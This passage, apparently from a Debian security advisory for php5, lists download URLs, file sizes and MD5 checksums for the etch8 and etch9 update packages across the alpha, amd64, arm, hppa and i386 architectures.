    Size/MD5 checksum:    36540 6be925b674ab26c2ea841b687ac4ea42
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:  2561590 ee8c982656d0ae818d5d7e30278f9bc5
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:  2561054 39dace240842d867d54db316702e5f3c
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:     5322 37b5faa03af5b8d884f00f09e83eb9f1
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    11844 6c7724b3ade66fb216a0f2f65834c35b
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:   219450 05f0624b0d2a7b14dc1a9a3d155d4915
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:   219098 0f2b4f24904c9d0d93697366bfeb5016
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    40298 b4e5f9407ee5929e9b9a803d2f150fb2
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    13388 36f6bfa2038f0dc117da5ce16b765725
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    24958 74bb6659ac1b5dda2aff708bcd28a757
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    24962 0059876e93d1d205a551859aac408abf
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    19598 55bc7abce75bb9e7ae9d5bd972f0e1de
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    19602 e0311e02b42c396ddc7c08af1c685ad3

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:     4888 d0d75714525d7f6f2995063b4b25ed71
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:  4860492 2bd166ef0d9ba43008d74aca8e8e8a20
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:  2451414 845f02e32df94736bb493aaca1d9a95b
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    13010 d34850d46541a47ad847e1dfb1500d88
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    38432 2e4648467a9ee3556d2a0ad6f625069b
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    13472 69f7a1ff6664947329952d275eb9618c
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:   218802 793e68b9b26f560c1440bd725ea1afcf
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    53932 eb115d67586f1ca4eb09e720726f1df6
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:     9392 d0150f1417094c27b629d13d5e3caac3
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    19414 7203980949b41fa24d9a711f0d053d32
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:   218658 9dd0fe223b3254454654a3924b5da017
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    71708 8aadf754f28cf30e9d20a92ebdfc468b
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    39156 79b8f87696e89dd7d4e7e032296d2986
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    36680 4999ec30196074be0b2a12805a64705b
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    39154 6d2a1b3d1546914cd791d8f4d970c084
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    38536 352e7aed5e4fe3331214b4e8eebb8d77
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    18644 c09011c18971fd1ae0a036e6bd0b5e13
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    12040 27d278d1d798b4888d7557067e1adc69
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    18648 f24f6736fa7790cc40ff2a719e3c8450
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:  4861936 585d7d013e8dbeeebee91314d6c40dbd
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    36682 2f69409ca659a7e24e15ba76735ff724
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    17562 e7b74728cc7c0c21d50d0369ad0edd0a
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    37030 fc6cdf000abe46cc55ca3c2c0a735196
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    13472 a6e5dda4edbe36a2c9f2f5a6662bebfe
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    24964 dc4fa9e0330f3ebf58c6743d01cd881b
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    17556 ac30b674fdaaaafd5d794b2bb0ed8e5d
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    19410 5e6ef49ad64c0a31148b5ff4b6689b8a
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    36414 589542e92811c0d6ff16ddf75b46f735
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:     9394 801c8af9b1c50d5f7a8daaa48b69d4d3
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    37030 654234afe1c67b7cf392cc71b06f3ce3
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    71496 ca60b38a2fb40f47f324db03fd4de395
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    36412 43c15e8cd18bad9654c7c4edd66c48e2
  http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    46584 ed3f112786bb3a3e4201d56c7c8c35d4
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:  2509464 0f89c31203788e53a8600d30c90d992e
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:     4894 4691d06be1f7ec87f83114530a8ca65b
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:  2508886 8218d94e73a3410520fb31d3b4877557
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:     5258 50df4950638c964af59483838fa4652a
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    12044 62700829adc8352d77a89e3ce9f15972
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    24970 990e26f0e359bec7b3839172df235a8e
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:  2509948 35ce9c23e8cfd611eb202662d9c72669
  http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    46756 fcc13bec751eb80c5e201c3c5b73f866
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:     5258 3c895e7d73cbeb065a48f61c97e5db89
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:   345364 dfb151ea132d5c5d9592265bb5f89c4c
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:  2509352 df04daa18c8e6e4fe27d77c7ca9f84cb
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:    54160 dc8ff15251cec38ce42a022677bb61e3
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:   346224 26c0cace07137d7f1b39fc7879064e3e
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_amd64.deb
    Size/MD5 checksum:  2450938 d9648e2ed15fb66f2b597e5e9dd35915
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_amd64.deb
    Size/MD5 checksum:    13016 c5e609ab145115e774b87c0b12eeaece

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    15836 85c63efb5c8c95d4399c134139b3462b
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:  2383648 b228d15038a5f8ebe5bb51fab2e66bac
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    33670 19a42d36090b6fe78c48388204da5b73
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:  2377014 cb4c11d594ab2c5ed67fd7551d009b1f
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    10926 e0e782813f9fa8f923fa677b12a9b4df
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    49332 5c40f1c082bc94a88caea47ff508fb96
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:  2384168 63adda3d4c12c7dde13c3e0246a300fa
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    33744 509f58c5f88b627a7d97e6d945d316ed
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    10932 3f6acdc3a4b165de948e92961ff80420
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:  2383394 43b6b0e73aa15820dd7c0accbca90b32
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:     4864 d713dbddce388350c8e1f761d32a2906
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:   215334 db7b89483afec847a71946154621c3f4
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:     4860 70f4c168c631093cd2e6318c443a0499
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    33636 c027e7f023a28e4bb257ab31f4501c11
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    33736 f422a23c243a8e43fd9c76acb60a583a
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:   344650 4fee9c88d55f0c825e0b7a2cbba7275c
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:     4634 e52c80f5bdcdf4c91075c98ad955cee1
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:     8748 35a304d09c311a7ebd3d5f6abb7c25c3
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    32900 f50bd8c6f49e7da91947a985aef91c42
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    11872 cb84f546440f595c966145009412d645
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:  2383992 740e00bf42e669fcd8d75a70e7c04756
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:  4715766 aedd7417bb18308c75a4b3f85f869f1d
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    63820 703211a2258b2f8587a0c06bc42f9f68
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    32900 d870141c63775ee3a740de8d277346a6
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    11866 6603f2902b27583fdb7b980f05577ea1
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:     8754 92f61b2a3a1d2e8f4f102620a6b92d19
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    49328 cfc2d7a0902323f214861ae3b0a98d6a
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    12446 f6f3d711fc4988bead58fa55c47b6d7b
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    12442 dded131c6988cf9c00cc8c774fbdd9e4
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:   215504 148579b4c8444bb8e4971db7f0fbc19e
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    17084 ed62744f4b8ced9479ed842df6f1c282
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    24070 65e1b42d194bf2b363184a083ebb1acd
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    17932 8abbb2440f5d75b7c3a4619fd46ff869
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:     4628 0382074fc1c8a5fb0227d7c831996947
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:   344644 a9262ee1169722ea5d507c20540a530c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:  2376942 3fad99e088b8621c60f07bff79070dff
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    33674 7b69ed5b56bdd6773e3b6c2d907a8d7a
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    24078 2b16de3796fb163bf8a49840ed40fdf7
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    17936 a4df1f03472b11d202a5d4498aaf6980
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:  4716336 83b4e3d6aed4dcad48f9d8fabe9962ec
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_arm.deb
    Size/MD5 checksum:    33674 3e1dbabd42e113fa6474bb0edf440295
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    33672 0d35763c489ba68e5411f6c9bca8a063
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    15826 b218909a542f58fc27a140613b665b0e
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    63818 6ff1af8b067b7dc2f6882678c2ff7bb5
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    33632 a087341b0f977504d87ccc8311ef68c2
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_arm.deb
    Size/MD5 checksum:    17084 21d195b0aae1a5aa6c368c01890f42e1

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:  2711510 81fb53781b65792bf5919d352f39d0be
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    19574 283ea97000ed1be7844ebc067c4eca93
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    40926 54c4f95b2685e188f978725faa9f2bac
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    20318 f52f6874cfd1e77682ffc368115e1b98
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:     9736 d3d51458adb77a192b7152b159f15cf8
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:     5812 c04b31bc2d34c1d97b67a8a3d8fb1c5b
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    12546 6ffa82e50cf6e661ef6f2e8f7b955c5e
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    14084 da4c9795dfa5e692edbc87649b12dd01
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    39456 726091bf96c7294236b532b406c3a643
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    75508 a66ac846b0e2366c134d188653a948f4
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    12554 2b426f120ecb957880a7d816b0997519
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    58522 a2e4963c7df2a1f767b802a5998e91a2
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:  2711220 60dde9e9198e5c29d7b483d9161b4a44
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:  5177262 52a00cfa4bb3e230a768e4b8eba02a45
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    39450 4846694e5e776ca31f2ab9d941a4f51a
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    14080 2f7f8877d148d55ca109131ec194ba43
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:   223744 d4bc67cce55ac3f52baeb3a902eb091b
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    42104 5e5281daa3b220fe8db56202a47863fa
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:     5492 ecc2858aca0892f211b3ba3ad22f38fb
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:  2606778 38d319393874561720fc53d524840b1a
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:   342158 1755ed0db881d4f4ff238e0d0d2eb6d4
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    42104 17a57a47e12b16a001639f84ef374a1b
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:     5486 1de6990860bb4c93122472cfc43b6a70
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:     9742 a9f17755cfcbe4ccac4c4416bed3e475
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    58520 b68e02c4aed9d0543165e5e0a65ba07e
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:  2710736 92700d00aa95a4915c2c113d13961347
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:     5808 22c956f44489eafc91f27883336f1a3c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:  2607050 eaa4f608922e130e2ea918b91f962d2b
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    40030 35c24000a15f117452c4397603b6c779
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:  2710950 e32ed411cdbbd36d0d07fcdfcd682482
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:   223614 a782a715686422f14c8b04b5fb839bad
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    28190 93fa8382507fb838a3530c119ca2c0be
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    40926 5a8921115a8025e5bd74a5c778d0644b
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:  5177900 eb188fd4fff77ecfbadbe0e3eebf0f99
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    19568 ed0f4446cda5514f951da2696294dd50
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    75508 b13e55a0d41721318beea4e63bfaa66f
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    37910 6a7b3dda435777c5a75741fe11d2c3a9
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    40034 3d8bcf6b5149027970ba367427f85e8a
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    15532 15be8bcbdae09b4bcd6ca847aa4fdadd
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    20312 c1dee2b30af804c56d6aab33e4541f49
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:   342208 d19e4e44d0c1f110d780e46f788e9fe6
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    15538 cf035167c87be437ea85c5cc592b0b73
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    28200 773d66d8a3a2b0f4146ff4d7ca555f7e
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    37910 67a80b0cdf7628191f36c1d2da8ac8bd
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_hppa.deb
    Size/MD5 checksum:    21114 cd57dc5f4d97ffa68c6fadf11739a950
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_hppa.deb
    Size/MD5 checksum:    21116 8c91d37d7d0044f2c35f59ed06f26937

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    34482 92e52d26b351a952740af9546783dc2e
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:   213464 4d1f54c33aa577aac0c44542255d9c0a
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:  2412720 1a243d0f883a2e38663606409e8bacbb
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    64922 5696aa90cf82acb1914c8a25b14e3fe3
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    50620 b0127bc91c8c2d02a76a9740a2592eec
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    34478 3a8ada96134b1465c3f38010a4b6616b
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:   214552 2527ae0144d4ae4d6b45524f83df0cdf
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:     4764 58ce72fa0c21b0e838a1c81d3f89e803
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    34060 367a341dbb4f1aa12529d59d0cadb60c
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    34062 202c526e399f06e59a8af5cdcf7def1c
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    36452 b8df2d477510bb5a5aa9b40b737b9793
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    12258 a8bba946d8de52bec1bede3c6efaf243
  http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    44160 ae78bbe6e0fd1c0d126e6a7cc4df7b29
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:     8628 15751bc879a4accc70b6fb8952011e9b
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    34498 944cb47d71ac581cf6235650aa6e27a2
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:  4755686 987b5f7376e4397bb8a331990d7a0abe
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_i386.deb
    Size/MD5 checksum:    33408 3299d41b80016a15958e3106661e3ddd
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_i386.deb
    Size/MD5 checksum:    34498 cab51c759499f121035c53ca74212b1d
